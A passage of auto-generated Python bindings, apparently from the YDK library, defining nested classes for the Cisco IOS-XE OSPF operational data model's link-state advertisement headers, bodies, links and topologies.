attribute:: prefix_options Prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, self).__init__() self.yang_name = "ospfv3-ia-prefix" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value) class IntfMultiTopology(Entity): """ OSPF interface topology .. attribute:: name (key) One of the topology enabled on this interface **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology, self).__init__() self.yang_name = "intf-multi-topology" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['name'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('name', (YLeaf(YType.str, 'name'), ['str'])), ]) self.name = None self._segment_path = lambda: "intf-multi-topology" + "[name='" + str(self.name) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology, ['name'], name, value) class AreaScopeLsa(Entity): """ List of OSPF area scope LSA .. 
attribute:: lsa_type (key) OSPF link scope LSA type **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: area_scope_lsa List of OSPF link scope LSAs **type**\: list of :py:class:`AreaScopeLsa_ <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa, self).__init__() self.yang_name = "area-scope-lsa" self.yang_parent_name = "ospf-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type'] self._child_classes = OrderedDict([("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])), ]) self.lsa_type = None self.area_scope_lsa = YList(self) self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa, ['lsa_type'], name, value) class AreaScopeLsa_(Entity): """ List of OSPF link scope LSAs .. attribute:: lsa_type (key) LSA Type **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: adv_router (key) Advertising router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. 
attribute:: decoded_completed The OSPF LSA body is fully decoded **type**\: bool **config**\: False .. attribute:: raw_data The complete LSA in network byte order as received/sent over the wire **type**\: list of int **range:** 0..255 **config**\: False .. attribute:: ospfv2_lsa OSPFv2 LSA **type**\: :py:class:`Ospfv2Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa>` **config**\: False .. attribute:: ospfv2_link Router LSA link **type**\: list of :py:class:`Ospfv2Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link>` **config**\: False .. attribute:: ospfv2_topology Summary LSA **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology>` **config**\: False .. attribute:: ospfv2_external External LSA **type**\: list of :py:class:`Ospfv2External <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External>` **config**\: False .. attribute:: ospfv3_lsa OSPFv3 LSA **type**\: :py:class:`Ospfv3Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa>` **config**\: False .. attribute:: ospfv3_link OSPFv3 links **type**\: list of :py:class:`Ospfv3Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link>` **config**\: False .. attribute:: ospfv3_prefix OSPFv3 prefix\-list **type**\: list of :py:class:`Ospfv3Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix>` **config**\: False .. 
attribute:: ospfv3_ia_prefix OSPFv3 intra\-area prefix\-list **type**\: list of :py:class:`Ospfv3IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_, self).__init__() self.yang_name = "area-scope-lsa" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type','adv_router'] self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])), ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])), ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])), ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])), ]) self.lsa_type = None self.adv_router = None self.decoded_completed 
= None self.raw_data = [] self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa() self.ospfv2_lsa.parent = self self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa" self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa() self.ospfv3_lsa.parent = self self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa" self.ospfv2_link = YList(self) self.ospfv2_topology = YList(self) self.ospfv2_external = YList(self) self.ospfv3_link = YList(self) self.ospfv3_prefix = YList(self) self.ospfv3_ia_prefix = YList(self) self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value) class Ospfv2Lsa(Entity): """ OSPFv2 LSA .. attribute:: header Decoded OSPFv2 LSA header data **type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header>` **config**\: False .. 
attribute:: lsa_body Decoded OSPFv2 LSA body data **type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa, self).__init__() self.yang_name = "ospfv2-lsa" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv2-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa, [], name, value) class Header(Entity): """ Decoded OSPFv2 LSA header data .. attribute:: lsa_id LSA ID **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? 
**type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: opaque_type Opaque type **type**\: int **range:** 0..255 **config**\: False .. attribute:: opaque_id Opaque ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: age LSA age **type**\: int **range:** 0..65535 **config**\: False .. attribute:: type LSA type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: adv_router LSA advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: seq_num LSA sequence number **type**\: str **config**\: False .. attribute:: checksum LSA checksum **type**\: str **config**\: False .. attribute:: length LSA length **type**\: int **range:** 0..65535 **config**\: False .. attribute:: flag_options LSA options **type**\: :py:class:`LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.LsaFlagOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])), ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])), ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', 
(YLeaf(YType.uint16, 'length'), ['int'])), ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])), ]) self.lsa_id = None self.opaque_type = None self.opaque_id = None self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self.flag_options = Bits() self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value) class LsaBody(Entity): """ Decoded OSPFv2 LSA body data .. attribute:: num_of_links Number of links **type**\: int **range:** 0..65535 **config**\: False .. attribute:: network Network details **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network>` **config**\: False .. attribute:: summary_mask Summary mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_mask External mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? 
**type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: body_flag_options LSA body flags **type**\: :py:class:`Ospfv2LsaBodyFlagsOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaBodyFlagsOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network))]) self._leafs = OrderedDict([ ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])), ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])), ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])), ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])), ]) self.num_of_links = None self.summary_mask = None self.external_mask = None self.body_flag_options = Bits() self.network = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value) class Network(Entity): """ Network details .. 
attribute:: network_mask IP network mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: attached_router List of the routers attached to the network **type**\: list of int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])), ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ]) self.network_mask = None self.attached_router = [] self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value) class Ospfv2Link(Entity): """ Router LSA link .. attribute:: link_id (key) Link ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: link_data (key) Link data **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: type Link type **type**\: int **range:** 0..255 **config**\: False .. 
attribute:: ospfv2_topology Topology specific information **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link, self).__init__() self.yang_name = "ospfv2-link" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_id','link_data'] self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology))]) self._leafs = OrderedDict([ ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ]) self.link_id = None self.link_data = None self.type = None self.ospfv2_topology = YList(self) self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value) class Ospfv2Topology(Entity): """ Topology specific information .. attribute:: mt_id (key) MT\-ID for topology enabled link **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: metric Metric for the topology **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "ospfv2-link" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2Topology(Entity): """ Summary LSA .. attribute:: mt_id (key) MT\-ID for topology enabled link **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: metric Metric for the topology **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2External(Entity): """ External LSA .. attribute:: mt_id (key) MT\-ID for topology enabled on the link **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: metric Metric for the topology **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. 
attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External, self).__init__() self.yang_name = "ospfv2-external" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ]) self.mt_id = None self.metric = None self.forwarding_address = None self.external_route_tag = None self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value) class Ospfv3Lsa(Entity): """ OSPFv3 LSA .. attribute:: header Decoded OSPFv3 LSA header **type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header>` **config**\: False .. 
attribute:: lsa_body Decoded OSPFv3 LSA body **type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa, self).__init__() self.yang_name = "ospfv3-lsa" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv3-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa, [], name, value) class Header(Entity): """ Decoded OSPFv3 LSA header .. attribute:: lsa_id LSA ID **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? 
